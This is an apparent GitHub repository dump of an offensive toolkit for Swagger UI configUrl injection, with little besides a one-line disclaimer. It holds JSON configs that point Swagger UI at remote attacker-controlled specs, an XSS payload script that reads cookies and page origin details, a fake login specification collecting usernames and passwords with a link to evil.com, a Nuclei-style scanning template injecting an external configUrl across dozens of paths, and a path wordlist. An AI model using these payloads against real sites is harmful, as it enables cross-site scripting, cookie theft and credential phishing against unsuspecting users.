├── README.md ├── login.json ├── rlogin.json ├── xsstest.json ├── xsscookie.json ├── script.js ├── rlogin.yaml ├── login.yaml ├── Swagger.yaml └── swagger-wordlist.txt /README.md: -------------------------------------------------------------------------------- 1 | ⚠️ **Disclaimer**: The content in this repository is for educational and informational purposes only; the authors hold no responsibility for misuse. Ensure proper authorization before use, act responsibly at your own risk, and comply with all legal and ethical guidelines. 2 | -------------------------------------------------------------------------------- /login.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.yaml", 6 | "name": "Coffinxp" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /rlogin.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.yaml", 6 | "name": "Coffinxp" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /xsstest.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.yaml", 6 | "name": "Coffinxp" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /xsscookie.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.yaml", 6 | "name": "Coffinxp" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /script.js: -------------------------------------------------------------------------------- 1 | const details = ` 2 | 🚨 XSS Detected 🚨 3 | ======================== 4 | 🏁 Origin: ${window.origin} 5 | 🌐 Location: ${window.location} 6 | 🔗 Href: ${window.location.href} 7 | 🏢 Hostname: ${window.location.hostname} 8 | 📂 Pathname: ${window.location.pathname} 9 | ❓ Search: ${window.location.search} 10 | 👪 Parent Origin: ${window.parent?.origin || 'N/A'} 11 | 🧑‍💻 Top Origin: ${window.top?.origin || 'N/A'} 12 | 🖼️ Frames Length: ${window.frames.length} 13 | 🪪 Window Name: ${window.name} 14 | ======================== 15 | 🍪 Cookies: ${document.cookie || 'No cookies available'} 16 | 🕵️ User-Agent: ${navigator.userAgent} 17 | ⏳ Timestamp: ${new Date().toISOString()} 18 | `; 19 | 20 | alert(details); 21 | console.log(details); 22 | -------------------------------------------------------------------------------- /rlogin.yaml: -------------------------------------------------------------------------------- 1 | swagger: '2.0' 2 | info: 3 | version: 1.0.0 4 | title: Login Page 5 | description: Login to continue services below or go to https://evil.com 6 | 7 | paths: 8 | /Login_Page: 9 | post: 10 | summary: Login here to continue 11 | description: Please provide your credentials to log in. 12 | parameters: 13 | - name: username 14 | in: formData 15 | description: The username for login 16 | required: true 17 | type: string 18 | - name: password 19 | in: formData 20 | description: The password for login 21 | required: true 22 | type: string 23 | tags: 24 | - Click here to login 25 | responses: 26 | '200': 27 | description: Successfully logged in and authenticated. 28 | '400': 29 | description: Invalid credentials or missing parameters. 30 | '500': 31 | description: Internal server error. 32 | -------------------------------------------------------------------------------- /login.yaml: -------------------------------------------------------------------------------- 1 | swagger: '2.0' 2 | info: 3 | version: 1.0.0 4 | title: Login Page 5 | description: '
6 | 7 |
8 |
9 | An error occurred while loading, please log in. 10 |
11 |
12 | 13 | 14 |
15 |

Login Page

16 |
17 | 30 |
31 |
32 | 33 | 34 |
35 | Coffinxp~/.lostsec 36 |
37 | 38 | 39 | ' 40 | paths: 41 | /: 42 | post: 43 | responses: 44 | '200': 45 | description: Login successful 46 | -------------------------------------------------------------------------------- /Swagger.yaml: -------------------------------------------------------------------------------- 1 | id: swagger-ui-config-url-injection-Extensive 2 | 3 | info: 4 | name: Swagger UI Config URL Injection 5 | author: Shadowbyte 6 | severity: low 7 | description: Detects if adding a configUrl parameter to Swagger UI endpoints leads to successful load (HTTP 200) and presence of Swagger UI content. Includes versioned paths. 8 | tags: swagger-ui,xss,injection 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/?configUrl=https://xss.smarpo.com/test.json' 14 | - '{{BaseURL}}/index.html?configUrl=https://xss.smarpo.com/test.json' 15 | - '{{BaseURL}}/swagger-ui?configUrl=https://xss.smarpo.com/test.json' 16 | - '{{BaseURL}}/api/?configUrl=https://xss.smarpo.com/test.json' 17 | - '{{BaseURL}}/docs/?configUrl=https://xss.smarpo.com/test.json' 18 | - '{{BaseURL}}/idm/v2/api-docs?configUrl=https://xss.smarpo.com/test.json' 19 | - '{{BaseURL}}/docs/api-reference?configUrl=https://xss.smarpo.com/test.json' 20 | - '{{BaseURL}}/swaggerui?configUrl=https://xss.smarpo.com/test.json' 21 | - '{{BaseURL}}/api/help?configUrl=https://xss.smarpo.com/test.json' 22 | - '{{BaseURL}}/doc?configUrl=https://xss.smarpo.com/test.json' 23 | - '{{BaseURL}}/api-reference?configUrl=https://xss.smarpo.com/test.json' 24 | - '{{BaseURL}}/swagger/docs/v1?configUrl=https://xss.smarpo.com/test.json' 25 | - '{{BaseURL}}/reference?configUrl=https://xss.smarpo.com/test.json' 26 | - '{{BaseURL}}/swagger/ui/index?configUrl=https://xss.smarpo.com/test.json' 27 | - '{{BaseURL}}/swagger/index.html?configUrl=https://xss.smarpo.com/test.json' 28 | - '{{BaseURL}}/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json' 29 | - '{{BaseURL}}/swagger/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json' 30 | - '{{BaseURL}}/api/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json' 31 | - '{{BaseURL}}/api-docs/?configUrl=https://xss.smarpo.com/test.json' 32 | - '{{BaseURL}}/api/index.html?configUrl=https://xss.smarpo.com/test.json' 33 | - '{{BaseURL}}/api/docs/?configUrl=https://xss.smarpo.com/test.json' 34 | - '{{BaseURL}}/api/swagger/index.html?configUrl=https://xss.smarpo.com/test.json' 35 | - '{{BaseURL}}/api/swagger/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json' 36 | - '{{BaseURL}}/api/swagger-ui/api-docs?configUrl=https://xss.smarpo.com/test.json' 37 | - '{{BaseURL}}/api/api-docs?configUrl=https://xss.smarpo.com/test.json' 38 | - '{{BaseURL}}/api/apidocs?configUrl=https://xss.smarpo.com/test.json' 39 | - '{{BaseURL}}/api/swagger?configUrl=https://xss.smarpo.com/test.json' 40 | - '{{BaseURL}}/api/swagger/static/index.html?configUrl=https://xss.smarpo.com/test.json' 41 | - '{{BaseURL}}/api/swagger-resources?configUrl=https://xss.smarpo.com/test.json' 42 | - '{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs?configUrl=https://xss.smarpo.com/test.json' 43 | - '{{BaseURL}}/api/__swagger__/?configUrl=https://xss.smarpo.com/test.json' 44 | - '{{BaseURL}}/api/_swagger_/?configUrl=https://xss.smarpo.com/test.json' 45 | - '{{BaseURL}}/api/spec?configUrl=https://xss.smarpo.com/test.json' 46 | - '{{BaseURL}}/api/swagger/ui/index?configUrl=https://xss.smarpo.com/test.json' 47 | - '{{BaseURL}}/__swagger__/?configUrl=https://xss.smarpo.com/test.json' 48 | - '{{BaseURL}}/api/v2/doc?configUrl=https://xss.smarpo.com/test.json' 49 | - '{{BaseURL}}/api/v1/?configUrl=https://xss.smarpo.com/test.json' 50 | - '{{BaseURL}}/api/v1/doc?configUrl=https://xss.smarpo.com/test.json' 51 | - '{{BaseURL}}/_swagger_/?configUrl=https://xss.smarpo.com/test.json' 52 | - '{{BaseURL}}/swagger-resources/restservices/v2/api-docs?configUrl=https://xss.smarpo.com/test.json' 53 | - '{{BaseURL}}/classicapi/doc/?configUrl=https://xss.smarpo.com/test.json' 54 | - '{{BaseURL}}/api/v1/openapi?configUrl=https://xss.smarpo.com/test.json' 55 | # Versioned paths 56 | - '{{BaseURL}}/v0.12/index.html?configUrl=https://xss.smarpo.com/test.json' 57 | - '{{BaseURL}}/v0.11/index.html?configUrl=https://xss.smarpo.com/test.json' 58 | - '{{BaseURL}}/v0.10/index.html?configUrl=https://xss.smarpo.com/test.json' 59 | - '{{BaseURL}}/v0.9/index.html?configUrl=https://xss.smarpo.com/test.json' 60 | - '{{BaseURL}}/v0.8/index.html?configUrl=https://xss.smarpo.com/test.json' 61 | - '{{BaseURL}}/v0.7/index.html?configUrl=https://xss.smarpo.com/test.json' 62 | - '{{BaseURL}}/v0.6/index.html?configUrl=https://xss.smarpo.com/test.json' 63 | - '{{BaseURL}}/v0.5/index.html?configUrl=https://xss.smarpo.com/test.json' 64 | - '{{BaseURL}}/v0.4/index.html?configUrl=https://xss.smarpo.com/test.json' 65 | - '{{BaseURL}}/v0.3/index.html?configUrl=https://xss.smarpo.com/test.json' 66 | - '{{BaseURL}}/v0.2/index.html?configUrl=https://xss.smarpo.com/test.json' 67 | - '{{BaseURL}}/v0.1/index.html?configUrl=https://xss.smarpo.com/test.json' 68 | 69 | redirects: true 70 | max-redirects: 3 71 | 72 | matchers-condition: and 73 | matchers: 74 | - type: word 75 | part: body 76 | words: 77 | - "swagger-ui" # Swagger UI specific identifier 78 | - "swagger-initializer" # Swagger UI common script 79 | - "api-docs" # Often present in API docs 80 | - "swagger.json" # Common in Swagger UI 81 | condition: or 82 | 83 | - type: status 84 | status: 85 | - 200 86 | -------------------------------------------------------------------------------- /swagger-wordlist.txt: -------------------------------------------------------------------------------- 1 | /api 2 | /api/ 3 | api 4 | api/ 5 | /api/api-docs 6 | /api/apidocs 7 | api/api-docs 8 | api/apidocs 9 | /api/api-docs/swagger.json 10 | /api/apidocs/swagger.json 11 | api/api-docs/swagger.json 12 | api/apidocs/swagger.json 13 | /api/api-docs/swagger.yaml 14 | /api/apidocs/swagger.yaml 15 | api/api-docs/swagger.yaml 16 | api/apidocs/swagger.yaml 17 | /api/doc 18 | api/doc 19 | /api/doc.json 20 | api/doc.json 21 | /api-docs/ 22 | /api/docs/ 23 | /api_docs 24 | api-docs 25 | api-docs/ 26 | api/docs 27 | api/docs/ 28 | api_docs 29 | /api-docs/swagger.json 30 | api-docs/swagger.json 31 | /api-docs/swagger.yaml 32 | api-docs/swagger.yaml 33 | api/documentation 34 | api/documentation/ 35 | /api/help 36 | api/help 37 | /api/index.html 38 | api/index.html 39 | api/openapi.json 40 | api/openapi.yaml 41 | /api-reference 42 | api-reference 43 | /api/spec 44 | api/spec 45 | /api/spec/swagger.json 46 | api/spec/swagger.json 47 | /api/spec/swagger.yaml 48 | api/spec/swagger.yaml 49 | /api/__swagger__/ 50 | /api/_swagger_/ 51 | /api/swagger 52 | api/__swagger__/ 53 | api/_swagger_/ 54 | api/swagger 55 | api/swagger/ 56 | /api/swagger_doc.json 57 | api/swagger_doc.json 58 | /api/swagger/index.html 59 | api/swagger/index.html 60 | /api/swagger.json 61 | api/swagger.json 62 | /api/swagger-resources 63 | api/swagger-resources 64 | /api/swagger-resources/restservices/v2/api-docs 65 | api/swagger-resources/restservices/v2/api-docs 66 | /api/swagger/static/index.html 67 | api/swagger/static/index.html 68 | /api/swagger/swagger-ui.html 69 | api/swagger/swagger-ui.html 70 | api/swagger-ui 71 | api/swagger-ui/ 72 | /api/swagger-ui/api-docs 73 | api/swagger-ui/api-docs 74 | /api/swagger-ui.html 75 | api/swagger-ui.html 76 | /api/swagger/ui/index 77 | api/swagger/ui/index 78 | /api/swagger-ui/swagger.json 79 | api/swagger-ui/swagger.json 80 | /api/swagger-ui/swagger.yaml 81 | api/swagger-ui/swagger.yaml 82 | /api/swagger.yaml 83 | api/swagger.yaml 84 | /api/swagger.yml 85 | api/swagger.yml 86 | /api/v1/ 87 | api/v1/ 88 | api/v1/api-docs 89 | /api/v1/doc 90 | api/v1/doc 91 | /api/v1/openapi 92 | api/v1/openapi 93 | /api/v1/swagger-ui/swagger.json 94 | api/v1/swagger-ui/swagger.json 95 | /api/v1/swagger-ui/swagger.yaml 96 | api/v1/swagger-ui/swagger.yaml 97 | api/v2/api-docs 98 | /api/v2/doc 99 | api/v2/doc 100 | api/v3/api-docs 101 | /classicapi/doc/ 102 | classicapi/doc/ 103 | /doc 104 | doc 105 | /docs 106 | /docs/ 107 | docs 108 | docs/ 109 | /docs/api-reference 110 | docs/api-reference 111 | /docu 112 | docu 113 | documentation 114 | documentation/ 115 | /idm/v2/api-docs 116 | idm/v2/api-docs 117 | /index.html 118 | index.html 119 | openapi 120 | openapi/ 121 | openapi/api-docs 122 | openapi/api-docs/ 123 | openapi.json 124 | openapi/swagger.json 125 | openapi/swagger-ui 126 | openapi/swagger-ui/ 127 | openapi/swagger-ui.html 128 | openapi/swagger.yaml 129 | openapi/v1 130 | openapi/v1.json 131 | openapi/v1.yaml 132 | openapi/v2 133 | openapi/v2.json 134 | openapi/v2.yaml 135 | openapi/v3 136 | openapi/v3.json 137 | openapi/v3.yaml 138 | openapi.yaml 139 | public/api-docs 140 | public/api-docs/ 141 | public/docs 142 | public/docs/ 143 | public/documentation 144 | public/documentation/ 145 | public/swagger 146 | public/swagger/ 147 | public/swagger.json 148 | public/swagger-ui 149 | public/swagger-ui/ 150 | public/swagger-ui.html 151 | public/swagger.yaml 152 | /reference 153 | reference 154 | rest/api-docs 155 | rest/api-docs/ 156 | rest/docs 157 | rest/docs/ 158 | rest/documentation 159 | rest/documentation/ 160 | rest/swagger/ 161 | rest/swagger.json 162 | rest/swagger-ui/ 163 | rest/swagger-ui.html 164 | rest/swagger.yaml 165 | /__swagger__/ 166 | /_swagger_/ 167 | /swagger 168 | __swagger__/ 169 | _swagger_/ 170 | swagger 171 | swagger/ 172 | /swagger/docs/v1 173 | swagger/docs/v1 174 | /swagger/index.html 175 | swagger/index.html 176 | /swagger.json 177 | swagger.json 178 | /swagger-resources 179 | swagger-resources 180 | swagger-resources/ 181 | swagger-resources/configuration 182 | swagger-resources/configuration/security 183 | swagger-resources/configuration/ui 184 | /swagger-resources/restservices/v2/api-docs 185 | swagger-resources/restservices/v2/api-docs 186 | swagger/swagger.json 187 | /swagger/swagger-ui.html 188 | swagger/swagger-ui.html 189 | /swagger/swagger-ui.js 190 | swagger/swagger-ui.js 191 | swagger/swagger.yaml 192 | /swagger-ui 193 | /swagger-ui/ 194 | /swaggerui 195 | swagger-ui 196 | swagger-ui/ 197 | swaggerui 198 | /swagger-ui.html 199 | swagger-ui.html 200 | /swagger/ui/index 201 | swagger/ui/index 202 | /swagger-ui.js 203 | swagger-ui.js 204 | /swagger-ui/swagger-ui.js 205 | /swagger/ui/swagger-ui.js 206 | swagger-ui/swagger-ui.js 207 | swagger/ui/swagger-ui.js 208 | /swagger/v1/swagger.json 209 | /swagger/v1/swagger.json/ 210 | swagger/v1/swagger.json 211 | /swagger/v1/swagger.yaml 212 | swagger/v1/swagger.yaml 213 | swagger/v2/swagger.json 214 | swagger/v3/swagger.json 215 | /swagger.yaml 216 | swagger.yaml 217 | /v0.10/index.html 218 | /v0.11/index.html 219 | /v0.12/index.html 220 | /v0.1/index.html 221 | /v0.2/index.html 222 | /v0.3/index.html 223 | /v0.4/index.html 224 | /v0.5/index.html 225 | /v0.6/index.html 226 | /v0.7/index.html 227 | /v0.8/index.html 228 | /v0.9/index.html 229 | v1/api-docs 230 | /v1/swagger.json 231 | v1/swagger.json 232 | v1/swagger.yaml 233 | /v1.x/swagger-ui.html 234 | v1.x/swagger-ui.html 235 | /v2/api-docs 236 | v2/api-docs 237 | v2/swagger.json 238 | v2/swagger.yaml 239 | v3/api-docs 240 | v3/swagger.json 241 | v3/swagger.yaml 242 | /webjars/swagger-ui/index.html 243 | webjars/swagger-ui/index.html 244 | --------------------------------------------------------------------------------